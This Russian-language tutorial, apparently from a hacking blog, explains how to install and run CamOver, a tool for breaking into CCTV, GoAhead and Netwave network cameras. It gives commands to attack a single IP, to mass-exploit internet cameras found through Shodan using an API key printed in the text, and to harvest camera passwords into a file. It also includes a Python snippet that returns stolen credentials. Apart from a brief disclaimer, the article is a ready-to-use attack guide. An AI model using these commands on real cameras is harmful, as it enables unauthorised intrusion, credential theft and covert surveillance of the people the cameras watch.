Сегодня расскажу об интересном инструменте — CamOver, который используется для взлома сетевых камер, получение их паролей и выполнения различных атак. Взлом происходит через уязвимости популярных моделей камер, таких как CCTV, GoAhead и Netwave. Ниже подробно объясню, как установить и использовать CamOver.
Еще по теме: Удаленный доступ к камере и микрофону
Взлом сетевых камер с CamOver
Статья в образовательных целях, для обучение этичных хакеров. Несанкционированный взлом сетевых камер считается незаконным и рассматривается как уголовное преступление. Ни редакция spy-soft.net, ни автор не несут ответственности за ваши действия.
Возможности:
- Эксплуатация уязвимостей в популярных моделях сетевых камер (CCTV, GoAhead, Netwave).
- Параллельная работа с несколькими камерами через многопоточность.
- Удобный интерфейс как для работы через командную строку, так и для использования API.
Установка CamOver
Для установки этого инструмента достаточно одной команды:
1 |
pip3 install git+https://github.com/EntySec/CamOver |
Использование CamOver
После установки, чтобы запустить CamOver, просто введите команду:
1 |
camover |
Вот список доступных параметров, которые можно использовать при запуске CamOver:
1 |
camover [-h] [-t] [-o OUTPUT] [-i INPUT] [-a ADDRESS] [--shodan SHODAN] [--zoomeye ZOOMEYE] [-p PAGES] |
1 2 3 4 5 6 7 8 |
-h, --help - показать это сообщение и выйти -t, --threads - использовать многопоточность для ускорения работы -o OUTPUT, --output OUTPUT - сохранить результаты в файл -i INPUT, --input INPUT - файл с адресами камер -a ADDRESS, --address ADDRESS - один адрес камеры --shodan SHODAN - ключ Shodan API для эксплуатации камер через Интернет --zoomeye ZOOMEYE - ключ ZoomEye API для эксплуатации камер через Интернет -p PAGES, --pages PAGES - количество страниц, которые нужно получить из ZoomEye |
Эксплуатация одной камеры
Предположим, есть камера с IP-адресом 192.168.99.100, и мы хотим проверить, можно ли ее взломать. Для этого просто выполняем команду:
1 |
camover -a 192.168.99.100 |
Эксплуатация камер через Интернет
Используем поисковик Shodan для поиска камер в Интернете и запускаем многопоточный взлом:
1 |
camover -t --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD |
Shodan API ключ ( PSKINdQe1GyxGgecYz2191H2JoS9qvgD) — это PRO ключ, предоставленный для примера. Можете использовать его или свой собственный API ключ.
Эксплуатация камер из файла
Допустим, у нас есть файл cameras.txt с адресами камер. Мы можем быстро взломать их и сохранить полученные пароли в файл passwords.txt с помощью следующей команды:
1 |
camover -t -i cameras.txt -o passwords.txt |
Эта команда попытается взломать все камеры, указанные в файле cameras.txt, и сохранить полученные пароли в passwords.txt.
Использование API
Также в CamOver есть свой Python API, который можно использовать для интеграции этого инструмента в свой код. Следующий код создает объект CamOver, запускает его для взлома камеры по IP-адресу и выводит полученные учетные данные на экран:
1 2 3 4 5 6 |
from camover import CamOver camover = CamOver() creds = camover.exploit('192.168.99.100') print(creds) |
Разбор кода:
- from camover import CamOver — импортирует класс CamOver из библиотеки CamOver, который предоставляет функционал для взаимодействия с камерой.
- camover = CamOver() — создает объект CamOver, который позволит вызвать методы этого класса для эксплуатации уязвимостей сетевых камер.
- creds = camover.exploit('192.168.99.100') — использует метод exploit, чтобы попытаться взломать камеру по IP-адресу 192.168.99.100. В результате выполнения этой команды, если уязвимость камеры будет успешно использована, возвращаются учетные данные камеры (логин и пароль). Эти данные сохраняются в переменную creds.
- print(creds) — выводит полученные учетные данные (логин и пароль камеры) на экран.
Заключение
Вот такой вот инструмент для эксплуатации уязвимостей сетевых камер. Если у вас есть интерес к этой теме, CamOver может стать полезным инструментом для исследования уязвимостей и тестирования безопасности сетей.
ПОЛЕЗНЫЕ ССЫЛКИ:
- Поиск онлайн-камер с помощью Netlas.io
- Как удаленно взломать камеру телефона и ПК используя CamPhish